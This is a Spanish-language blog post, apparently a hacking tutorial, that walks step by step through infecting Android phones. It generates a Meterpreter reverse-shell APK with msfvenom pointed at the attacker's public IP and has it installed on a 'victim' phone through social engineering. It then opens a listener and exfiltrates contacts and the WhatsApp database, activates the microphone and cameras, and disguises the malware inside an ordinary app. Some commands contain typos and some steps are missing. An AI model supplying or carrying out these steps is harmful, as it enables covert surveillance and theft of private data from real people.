Siendo el sistema operativo móvil mas utilizado del mundo, presenta serios y hasta preocupantes fallos de seguridad que comprometen nuestra información personal sensible, algunas de ellas pueden ser nuestras fotos y la preciosa base de datos de Whatsapp.
Para atacar y acceder a un dispositivo móvil, es necesario conocer las brechas de seguridad que estos presentan para luego explotarlas y hacer uso de ellas. Las fallas pueden ser bastantes, pero aún no han sido descubiertas o no han sido reveladas para que los desarrolladores de android realicen el parche del sistema y así realicen la corrección de la vulnerabilidad a través de una actualización a sus usuarios. En este caso me enfocare a enseñar una serie de pasos para explotar una vulnerabilidad específica.
Para esto necesitaremos un sistema operativo basado en Debian GNU/Linux llamado Kali Linux.
Puedes descargarlo gratis desde kali.org/downloads/
Una vez descargada la imagen ISO puedes instalar Kali Linux junto a Windows en tu PC, pero también puedes montarla en un PenDrive(USB) o CD para probar el sistema sin necesidad de instalarlo seleccionando la opción LIVE, pero la opción mas recomendable es desde tu Windows descargar VirtualBox para que puedas usar la ISO de Kali Linux y instalar el sistema para luego usarlo como maquina virtual. Después de realizar los paso anteriores procederíamos a utilizar el poderoso sistema operativo para Hacking y procederemos a ejecutar lo siguiente.
1. Abriremos una terminal o consola de comandos desde Kali Linux
2. Ejecutamos el comando msfconsole para abrir una consola de metasploit
Luego en la consola escribiremos lo siguiente
msfvenom -p android/meterpreter/reverse_tcp lhots= 181.58.38.100 LPORT=4546 R > /root/Desktop/system.apk
IMPORTANTE: El LHOST es nuestra IP Publica
5. Continuación nos dirigiremos al escritorio y ubicaremos el fichero de nombre system.apk
6. El fichero es nuestro Malware que haremos llegar al teléfono victima para instalarlo mediante ingeniería social
una vez instalada la aplicación maliciosa en el teléfono procederemos a ejecutar lo siguiente...
7. Escribiremos en la consola: use multi/handler
damos enter. (Esto para percatar conexiones entrantes a nuestra IP y al puerto 4546)
8. Luego setearemos nuestro payload escribiendo lo siguiente: set PAYLOAD android/meterpreter/reverse_tcp
damos enter...
9. después en la consola escribiremos set LHOST y nuestra ip publica
y luego enter..
10. Setearemos nuestro puerto escribiendo en la consola de la siguiente manera.
daremos enter...
11. Procederemos a colocarnos en escucha de las conexiones a nuestra IP y puerto con el famoso comando exploit
enter y nos pondremos en escucha, podemos colocar el comando exploit -j para escuchar todas las conexiones de varios teléfonos.
12. Cuando el o los teléfonos victima ejecuten la aplicación en la consola obtendremos los siguiente.
que nos indica que se abrió una sesión de meterpreter, lo que significa que ya podemos apodemos apoderarnos del móvi.!!!
13. Escribe el comando help ver la lista de comandos que puedes utilizar.
Puedes desde descargarte los contactos del teléfono hasta la base de datos de WhatsApp como nuestro continuación escribiendo lo siguiente: download /sdcard/whatsApp/Databases/
también puedes activar funciones como grabar audio en vivo activando el microfono y tomar fotos con sus cámaras frontales.
Para hacer mas creíble nuestra aplicación maliciosa o malware, podemos funcionar el fichero .apk que hemos creado con nuestro Kali Linux con una aplicación que estemos desarrollando en otras plataformas.
Si eres desarrollador y estas creando una app para traducir textos por ejemplo, con otras herramientas que serán tema de otra publicación puedes fucionar el Malware o una app normal y la aplicación realizara exactamente lo mismo.
Autor: Harley Vidal
0 Comentarios